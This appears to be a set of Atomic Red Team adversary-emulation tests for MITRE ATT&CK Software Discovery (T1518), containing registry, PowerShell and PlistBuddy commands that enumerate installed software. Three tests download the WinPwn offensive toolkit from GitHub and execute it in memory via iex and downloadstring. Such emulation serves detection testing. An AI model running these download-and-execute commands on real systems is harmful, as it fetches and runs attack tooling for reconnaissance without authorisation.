Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Such software may be deployed widely across the environment for configuration management or security reasons, such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072), and may allow adversaries broad access to infect devices or move laterally. Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
Query the registry to determine the version of internet explorer installed on the system. Upon execution, version information about internet explorer will be displayed.
Supported Platforms: Windows
auto_generated_guid: 68981660-6670-47ee-a5fa-7e74806420a4
1
command_prompt
reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersion
Query the registry to determine software and versions installed on the system. Upon execution a table of software name and version information will be displayed.
Supported Platforms: Windows
auto_generated_guid: c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b
1
powershell
1
2
Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize
Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize
Adversaries may attempt to get a listing of non-security related software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors
Supported Platforms: macOS
auto_generated_guid: 103d6533-fd2a-4d08-976a-4a598565280f
1
sh
1
2
/usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist
/usr/libexec/PlistBuddy -c "print :CFBundleVersion" /Applications/Safari.app/Contents/Info.plist
Search for any .NET binary file in a share using the Dotnetsearch function of WinPwn
Supported Platforms: Windows
auto_generated_guid: 7e79a1b6-519e-433c-ad55-3ff293667101
1
powershell
1
2
3
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Dotnetsearch -noninteractive -consoleoutput
Search for .NET Service-Binaries on this system via winpwn dotnet function of WinPwn.
Supported Platforms: Windows
auto_generated_guid: 10ba02d0-ab76-4f80-940d-451633f24c5b
1
powershell
1
2
3
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
dotnet -consoleoutput -noninteractive
Start PowerUpSQL Checks using powerSQL function of WinPwn
Supported Platforms: Windows
auto_generated_guid: 0bb64470-582a-4155-bde2-d6003a95ed34
1
powershell
1
2
3
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powerSQL -noninteractive -consoleoutput